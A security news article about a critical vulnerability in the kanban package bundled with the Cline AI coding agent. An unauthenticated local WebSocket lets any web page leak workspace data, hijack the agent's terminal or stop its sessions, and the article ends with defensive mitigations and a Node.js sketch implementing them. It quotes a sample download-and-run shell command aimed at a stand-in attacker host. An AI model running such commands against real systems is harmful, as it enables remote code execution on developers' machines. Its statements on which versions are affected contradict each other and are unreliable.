
Critical Cline AI Agent Vulnerability Enables Remote Code Execution Attacks

Security researcher Sagilayani disclosed CVE-2026-44211 on GitHub, revealing a severe vulnerability in the kanban npm package bundled with the Cline AI coding assistant.

Carrying a CVSS v3.1 score of 9.3 (Critical), the flaw affects all versions before v2.13.0 and has no patch available as of publication.

Cline AI Agent Vulnerability

The kanban package starts a WebSocket server on 127.0.0.1:3484 with zero Origin header validation.

Unlike standard HTTP requests, WebSocket connections are not covered by browser CORS protections, meaning any malicious webpage can silently connect to the local server without restriction.

The attack unfolds in four stages:

  • Info leak — A malicious page connects to /api/runtime/ws and instantly receives workspace data, including filesystem paths, git branch names, task titles, and live AI agent chat messages
  • Session detection — The same WebSocket streams task_sessions_updated events, exposing active agent session IDs and process IDs
  • Terminal hijack (RCE) — The attacker connects to /api/terminal/io, injects an arbitrary shell command (e.g., curl https://attacker.com/shell.sh | bash), and the AI agent executes it as a user command
  • Denial-of-service — The /api/terminal/control endpoint lets attackers kill any running agent session with a simple {"type": "stop"} message

All three vulnerable endpoints require zero authentication and perform no Origin validation.

The attack is rooted in two weaknesses: CWE-306 (Missing Authentication for Critical Function) and CWE-1385 (Missing Origin Validation in WebSockets).

The researcher confirmed the exploit across macOS, Linux, and Windows on Firefox, Chrome, and Arc browsers and published a full proof-of-concept alongside the disclosure.

The vulnerability compromises all three pillars of security:

  • Confidentiality — Workspace paths, git data, and AI chat messages leak in real time
  • Integrity — Arbitrary shell commands execute inside the developer’s environment
  • Availability — Active agent tasks can be silently terminated at will

Until a patched version is released, the researcher recommends three mitigations the Cline team should implement:

  • Validate the Origin header on all WebSocket upgrade requests, rejecting non-localhost origins
  • Generate a random secret token at server startup and require it as a query parameter on all WebSocket connections
  • Add authentication checks to terminal WebSocket endpoints to verify the connecting client is the legitimate kanban UI
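As an added illustration of the three mitigations above (this is not code from Cline, the kanban package, or the researcher's disclosure), the following Node.js sketch decides whether a WebSocket upgrade request may proceed. The function names, the allowed origin list and the `token` query parameter name are assumptions made for the example; only the port 3484 comes from the article.

```javascript
const crypto = require('node:crypto');

const PORT = 3484; // loopback port named in the article
// Assumption: the legitimate UI is served from these exact origins.
const ALLOWED_ORIGINS = new Set([
  `http://127.0.0.1:${PORT}`,
  `http://localhost:${PORT}`,
]);

// Mitigation 2: random per-process secret created at server startup.
function newSessionToken() {
  return crypto.randomBytes(32).toString('hex');
}

// Hash both sides to a fixed length so timingSafeEqual never throws on a
// length mismatch and the comparison does not leak where the strings differ.
function tokensMatch(presented, expected) {
  if (typeof presented !== 'string' || presented.length === 0) return false;
  const digest = (s) => crypto.createHash('sha256').update(s).digest();
  return crypto.timingSafeEqual(digest(presented), digest(expected));
}

// Decide whether an HTTP upgrade request may become a WebSocket.
// `req` only needs `.url` and `.headers`, like http.IncomingMessage.
function authorizeUpgrade(req, expectedToken) {
  const origin = req.headers.origin;
  // Mitigation 1: exact-match allowlist. Substring or prefix checks would
  // accept look-alike hosts, and the literal "null" origin must not pass.
  if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
    return { ok: false, status: 403, reason: 'origin not allowed' };
  }
  // Mitigations 2 and 3: every client, browser or not, must present the token.
  const token = new URL(req.url, `http://127.0.0.1:${PORT}`).searchParams.get('token');
  if (!tokensMatch(token, expectedToken)) {
    return { ok: false, status: 401, reason: 'missing or invalid token' };
  }
  return { ok: true, status: 101, reason: 'upgrade permitted' };
}
```

In a Node `http` server this check would run in the `upgrade` event handler, closing the socket with the returned status whenever `ok` is false, before any WebSocket frames are read.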

Developers running Cline v2.13.0 or earlier with the kanban feature enabled should avoid running the kanban server in untrusted network environments until an official fix is released.


The post Critical Cline AI Agent Vulnerability Enables Remote Code Execution Attacks appeared first on Cyber Security News.
